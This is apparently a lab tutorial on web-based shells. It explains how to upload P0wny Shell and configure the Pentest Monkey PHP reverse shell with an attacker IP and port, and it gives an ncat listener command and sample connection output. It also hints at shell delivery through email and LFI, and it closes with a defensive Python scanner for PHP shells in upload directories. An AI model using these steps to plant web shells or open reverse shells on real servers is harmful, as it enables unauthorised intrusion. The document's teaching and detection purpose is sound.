Web Based shells

If we can upload (or create) files on the remote server then a web based shell might be an option. Using the web server's interpreter to get a shell can help us work around restrictions on accessing the operating system, or tools like netcat not being available.

While web based shells tend to give us a more "user friendly" experience, not all of them are fully featured shells. Some may just be a wrapper around RCE, so things like environment variables, or interactive sessions (like text editors) may not be available to play with.

In this article, we will take a look at two useful web based shells. One will let us use PHP to create a reverse shell, the other gives us an interactive, shell-like webpage.

Getting a web based shell onto the remote system.

The first thing we need to do is get the shell onto the remote system. Broadly speaking we have 3 options here.

  • Upload the shell using web functionality
  • Upload the shell using another server function, like FTP [1]
  • Download the shell using RCE

Depending on how we get the shell onto the system, we will also need to find a way to actually run the thing. The examples here should let you run the shell directly. We will look at more complex methods later in the module.

P0wny Shell

The first web based shell we will look at is the P0wny Shell

P0wny Shell gives us an interactive, shell-like interface on PHP based systems. While it's not a proper TTY style shell, it does give us a quick and dirty way of running commands on a remote system. It also has some useful features like history, and file uploads / downloads.

Using P0wny Shell is easy [2]: "just" upload the shell to the remote, and navigate to its location.

Task

You can see the shell in action on the Shell Playground image. You have a couple of options:

  • "Pre Uploaded" version, where you can play with the shell and test the functionality
  • Try to upload a copy of the shell yourself, then access it.

Pentest Monkey Shell

Another useful PHP based shell is the Pentest Monkey PHP Reverse Shell

Unlike P0wny shell this is not interactive, but instead lets us create a reverse shell using the PHP interpreter itself. This is useful when we don't have access to other OS functionality, or things like netcat, as we need nothing but PHP itself.

To get the pentest monkey shell working we do the following

  1. Download a copy of the shell from the Git Repo above
  2. READ the source (you don't just want to run files you download)
  3. As it's a reverse shell, we need to tell it where to connect to. For this we need to modify the following lines, to add our IP, and whatever port we want to use.

    $ip = '127.0.0.1';  // CHANGE THIS
    $port = 1234;       // CHANGE THIS
    
  4. Upload the shell to the remote server, and work out where it lives

  5. We now need to set up a listener to catch the shell when it starts. For this we can use netcat, and whatever port you picked for $port

    ncat -nvlp 4444
    
  6. Open the shell.php file you uploaded in the browser. If it looks like it hangs, we are probably good to go. Otherwise, it usually gives you a useful error message. A "connection refused" error means you either forgot to start a listener, got the IP address wrong, or are being trolled by a firewall

  7. The netcat listener should now give you a connection to the remote machine.

    $ ncat -nvlp 1234
    Ncat: Version 7.91 ( https://nmap.org/ncat )
    Ncat: Listening on :::1234
    Ncat: Listening on 0.0.0.0:1234
    Ncat: Connection from 172.23.0.2.
    Ncat: Connection from 172.23.0.2:52942.
    Linux 9cca9d929fdd 5.4.80-2-lts #1 SMP Sat, 28 Nov 2020 15:11:01 +0000 x86_64 GNU/Linux
    22:08:05 up 8 days,  1:36,  0 users,  load average: 0.16, 0.20, 0.17
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $
    

Task

You can see the shell in action on the Shell Playground image. You have a couple of options:

  • "Pre Uploaded" version, where you can play with the shell and test the functionality
  • Try to upload a copy of the shell yourself, then access it.

Summary

In this article we have taken a brief look at two common web based shells. These cover the two ends of the web shell spectrum: an interactive shell that allows us to run our commands in a webpage, and a reverse shell that will connect to a listener. While the examples given are PHP focused, similar shells are available for other languages.

For the lab you will get the chance to play with the different types of shell, and see how they work in action.
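
Seen from the defending side, both shells above are PHP files that ended up in a web-served directory, so a scan of upload locations for PHP that executes commands or opens outbound sockets is a cheap check. The sketch below is an added example, not part of the original article or of either shell project; the indicator lists, file names and sample contents are constructed assumptions, not a complete signature set.

```python
import re
import tempfile
from pathlib import Path

# Assumed, illustrative indicators; real shells vary and can obfuscate these names.
EXEC_CALLS = re.compile(r"\b(proc_open|shell_exec|passthru|popen|system|exec)\s*\(", re.I)
NET_CALLS = re.compile(r"\b(fsockopen|pfsockopen|stream_socket_client|socket_connect)\s*\(", re.I)
PHP_NAME = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.I)  # also matches shell.php.jpg


def classify(path):
    """Return a finding label for one file, or None if nothing stands out."""
    text = path.read_bytes()[:1_000_000].decode("latin-1")
    has_php = "<?php" in text.lower() or "<?=" in text
    if not (has_php or PHP_NAME.search(path.name)):
        return None  # plain data file: function names in it are not code
    runs_cmd, dials_out = bool(EXEC_CALLS.search(text)), bool(NET_CALLS.search(text))
    if runs_cmd and dials_out:
        return "reverse-shell pattern: outbound socket plus process execution"
    if runs_cmd:
        return "command execution from a web-served file"
    return "PHP code in an upload directory"


def scan(upload_dir):
    # Map each suspicious file (path relative to upload_dir) to its label.
    findings = {}
    for p in sorted(Path(upload_dir).rglob("*")):
        label = classify(p) if p.is_file() else None
        if label:
            findings[p.relative_to(upload_dir).as_posix()] = label
    return findings


def demo():
    """Scan a temporary directory of constructed, non-functional sample files."""
    samples = {
        "notes.txt": "system (noun): a set of things working together",
        "gallery.phtml": "<?php echo htmlspecialchars($title);",
        "term.php": "<?php $out = shell_exec($c);  // constructed fragment",
        "rs.php.jpg": "<?php $s = fsockopen($ip, $port); proc_open($sh, $spec, $pipes);",
    }
    with tempfile.TemporaryDirectory() as d:
        for name, body in samples.items():
            (Path(d) / name).write_text(body, encoding="latin-1")
        return scan(d)


if __name__ == "__main__":
    print(demo())
```

A hit is a prompt to investigate rather than proof of compromise; the stronger control is to stop the web server from executing anything in upload directories at all.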


  1. It's also really cool to send a server an Email, then drop a shell via LFI 

  2. If there is no protection against uploads and viewing files 
